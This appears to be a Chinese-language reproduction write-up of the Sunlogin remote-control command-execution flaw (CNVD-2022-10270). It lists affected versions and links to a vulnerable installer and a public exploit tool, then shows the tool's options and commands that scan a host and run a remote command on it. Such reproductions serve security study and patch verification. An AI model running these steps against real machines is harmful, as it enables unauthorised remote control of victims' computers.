向日葵命令执行漏洞复现（CNVD-2022-10270）

向日葵简约版漏洞地址：https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672

向日葵个人版for Windows：https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270

影响版本

向日葵个人版for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315 (2021.12)

环境

环境我用的是10.3.0.27372版本下载地址：https://wwi.lanzouy.com/irKi301jjype

检测与利用工具：https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

解压赠予执行权限

漏洞复现

工具使用说明

 zss@zss>>> ./xrkRce


╔═╗┬ ┬┌┐┌╦  ┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐
╚═╗│ ││││║  │ ││ ┬││││───╠╦╝│  ├┤ 
╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘   ╩╚═└─┘└─┘

                                                by:T00ls.net
                                                向日葵Rce
----------------------------------------------

Usage of ./xrkRce:
  -c string   //要执行的命令
        cmd 
  -h string   //目标ip
        ip
  -p string	   //指定扫描端口默认40000-65535
        port:40000-65535 (default "40000-65535")
  -t string		//执行模式默认扫描模式(scan)  代码执行模式(rce)
        type (default "scan")
  -x int 	//指定线程默认1000
        x (default 1000)

目标扫描

./xrkRce -h  192.168.0.107  -t scan

代码执行

./xrkRce -h  192.168.0.107  -t rce -p 49180 -c "ipconfig"